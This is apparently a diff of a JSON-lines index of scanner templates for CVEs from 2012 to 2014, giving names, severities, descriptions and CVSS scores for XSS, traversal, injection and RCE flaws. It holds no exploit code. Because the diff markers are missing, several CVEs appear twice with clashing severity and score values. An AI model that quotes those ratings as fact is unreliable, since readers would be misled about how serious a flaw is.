{"ID":"CVE-2012-4273","Info":{"Name":"2 Click Socialmedia Buttons \u003c 0.34 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4273.yaml"}
{"ID":"CVE-2012-4547","Info":{"Name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","Severity":"medium","Description":"AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4547.yaml"}
{"ID":"CVE-2012-4768","Info":{"Name":"WordPress Plugin Download Monitor \u003c 3.3.5.9 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4768.yaml"}
{"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"high","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-4878.yaml"}
{"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"medium","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-4878.yaml"}
{"ID":"CVE-2012-4889","Info":{"Name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4889.yaml"}
{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"}
{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"}
{"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"}
{"ID":"CVE-2012-5321","Info":{"Name":"TikiWiki CMS Groupware v8.3 - Open Redirect","Severity":"medium","Description":"tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka \"frame injection\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-5321.yaml"}
{"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"}
{"ID":"CVE-2012-6499","Info":{"Name":"WordPress Plugin Age Verification v0.4 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-6499.yaml"}
{"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"}
{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"}
{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"}
{"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"}
{"ID":"CVE-2013-2287","Info":{"Name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-2287.yaml"}
{"ID":"CVE-2013-2621","Info":{"Name":"Telaen =\u003e v1.3.1 - Open Redirect","Severity":"medium","Description":"Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2621.yaml"}
@ -205,20 +205,20 @@
{"ID":"CVE-2013-3827","Info":{"Name":"Javafaces LFI","Severity":"medium","Description":"An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-3827.yaml"}
{"ID":"CVE-2013-4117","Info":{"Name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-4117.yaml"}
{"ID":"CVE-2013-4625","Info":{"Name":"WordPress Plugin Duplicator \u003c 0.4.5 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-4625.yaml"}
{"ID":"CVE-2013-5528","Info":{"Name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2013/CVE-2013-5528.yaml"}
{"ID":"CVE-2013-5979","Info":{"Name":"Xibo 1.2.2/1.4.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-5979.yaml"}
{"ID":"CVE-2013-6281","Info":{"Name":"WordPress Spreadsheet - Cross-Site Scripting","Severity":"medium","Description":"WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-6281.yaml"}
{"ID":"CVE-2013-7091","Info":{"Name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","Severity":"critical","Description":"A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7091.yaml"}
{"ID":"CVE-2013-7240","Info":{"Name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2013/CVE-2013-7240.yaml"}
{"ID":"CVE-2013-5528","Info":{"Name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2013/CVE-2013-5528.yaml"}
{"ID":"CVE-2013-5979","Info":{"Name":"Xibo 1.2.2/1.4.1 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-5979.yaml"}
{"ID":"CVE-2013-6281","Info":{"Name":"WordPress Spreadsheet - Cross-Site Scripting","Severity":"medium","Description":"WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-6281.yaml"}
{"ID":"CVE-2013-7091","Info":{"Name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7091.yaml"}
{"ID":"CVE-2013-7240","Info":{"Name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7240.yaml"}
{"ID":"CVE-2013-7285","Info":{"Name":"XStream \u003c1.4.6/1.4.10 - Remote Code Execution","Severity":"critical","Description":"Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2013/CVE-2013-7285.yaml"}
{"ID":"CVE-2014-10037","Info":{"Name":"DomPHP 0.83 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-10037.yaml"}
{"ID":"CVE-2014-1203","Info":{"Name":"Eyou E-Mail \u003c3.6 - Remote Code Execution","Severity":"critical","Description":"Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-1203.yaml"}
{"ID":"CVE-2014-2321","Info":{"Name":"ZTE Cable Modem Web Shell","Severity":"high","Description":"ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-2321.yaml"}
{"ID":"CVE-2014-2321","Info":{"Name":"ZTE Cable Modem Web Shell","Severity":"critical","Description":"ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-2321.yaml"}
{"ID":"CVE-2014-2323","Info":{"Name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","Severity":"critical","Description":"A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-2323.yaml"}
{"ID":"CVE-2014-2383","Info":{"Name":"Dompdf \u003c v0.6.0 - Local File Inclusion","Severity":"high","Description":"A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-2383.yaml"}
{"ID":"CVE-2014-2383","Info":{"Name":"Dompdf \u003c v0.6.0 - Local File Inclusion","Severity":"medium","Description":"A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2014/CVE-2014-2383.yaml"}
{"ID":"CVE-2014-2908","Info":{"Name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-2908.yaml"}
{"ID":"CVE-2014-2962","Info":{"Name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2014/CVE-2014-2962.yaml"}
{"ID":"CVE-2014-3120","Info":{"Name":"ElasticSearch v1.1.1/1.2 RCE","Severity":"critical","Description":"The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2014/CVE-2014-3120.yaml"}
{"ID":"CVE-2014-3120","Info":{"Name":"ElasticSearch v1.1.1/1.2 RCE","Severity":"medium","Description":"The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2014/CVE-2014-3120.yaml"}
{"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"}
{"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"}
{"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"}
@ -232,20 +232,20 @@
{"ID":"CVE-2014-4558","Info":{"Name":"WooCommerce Swipe \u003c= 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4558.yaml"}
{"ID":"CVE-2014-4561","Info":{"Name":"Ultimate Weather Plugin \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4561.yaml"}
{"ID":"CVE-2014-4592","Info":{"Name":"WP Planet \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4592.yaml"}
{"ID":"CVE-2014-4940","Info":{"Name":"WordPress Plugin Tera Charts - Local File Inclusion","Severity":"high","Description":"Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-4940.yaml"}
{"ID":"CVE-2014-4942","Info":{"Name":"WordPress EasyCart \u003c2.0.6 - Information Disclosure","Severity":"low","Description":"WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2014/CVE-2014-4942.yaml"}
{"ID":"CVE-2014-5111","Info":{"Name":"Fonality trixbox - Local File Inclusion","Severity":"high","Description":"Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-5111.yaml"}
{"ID":"CVE-2014-5258","Info":{"Name":"webEdition 6.3.8.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2014/CVE-2014-5258.yaml"}
{"ID":"CVE-2014-5368","Info":{"Name":"WordPress Plugin WP Content Source Control - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5368.yaml"}
{"ID":"CVE-2014-4940","Info":{"Name":"WordPress Plugin Tera Charts - Local File Inclusion","Severity":"medium","Description":"Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4940.yaml"}
{"ID":"CVE-2014-4942","Info":{"Name":"WordPress EasyCart \u003c2.0.6 - Information Disclosure","Severity":"medium","Description":"WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4942.yaml"}
{"ID":"CVE-2014-5111","Info":{"Name":"Fonality trixbox - Local File Inclusion","Severity":"medium","Description":"Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5111.yaml"}
{"ID":"CVE-2014-5258","Info":{"Name":"webEdition 6.3.8.0 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2014/CVE-2014-5258.yaml"}
{"ID":"CVE-2014-5368","Info":{"Name":"WordPress Plugin WP Content Source Control - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5368.yaml"}
{"ID":"CVE-2014-6271","Info":{"Name":"ShellShock - Remote Code Execution","Severity":"critical","Description":"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-6271.yaml"}
{"ID":"CVE-2014-6287","Info":{"Name":"HTTP File Server \u003c2.3c - Remote Command Execution","Severity":"critical","Description":"HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-6287.yaml"}
{"ID":"CVE-2014-6308","Info":{"Name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-6308.yaml"}
{"ID":"CVE-2014-6308","Info":{"Name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-6308.yaml"}
{"ID":"CVE-2014-8676","Info":{"Name":"Simple Online Planning Tool \u003c1.3.2 - Local File Inclusion","Severity":"medium","Description":"SOPlanning \u003c1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2014/CVE-2014-8676.yaml"}
{"ID":"CVE-2014-8682","Info":{"Name":"Gogs (Go Git Service) - SQL Injection","Severity":"critical","Description":"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-8682.yaml"}
{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"}
{"ID":"CVE-2014-8682","Info":{"Name":"Gogs (Go Git Service) - SQL Injection","Severity":"high","Description":"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-8682.yaml"}
{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"}
{"ID":"CVE-2014-9094","Info":{"Name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9094.yaml"}
{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"high","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"}
{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"}
{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"medium","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"}
